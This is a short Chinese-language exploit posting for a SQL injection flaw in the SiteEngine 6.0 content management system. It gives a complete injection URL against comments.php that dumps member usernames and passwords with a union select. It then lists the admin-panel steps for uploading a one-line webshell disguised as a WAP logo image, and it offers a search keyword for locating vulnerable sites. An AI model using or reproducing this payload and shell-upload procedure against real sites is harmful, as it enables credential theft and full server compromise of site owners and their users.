|
################################################################################# #标题: SiteEngine 6.0 SQL注入漏洞 #日期: 2010-11-25 #作者: Beach #Team: www.linux520.com #厂商: www.siteengine.net www.boka.cn #关键字: "Powered by SiteEngine" //300,000 +~ ################################################################################# [*]描述: 利用这个漏洞需要评论功能开启(默认开启) ################################################################################# [*]利用:
http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,group_concat(username,0x3a,password,0x3c62723e),4,5, ... ,24,25,26+from+boka_members%23
################################################################################## [*]上Shell:
管理后台: http://server/admin/ 系统维护---> wap设置---> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) ---> 确定--->马上浏览--->看图片属性即为一句话地址
##################################################################################
|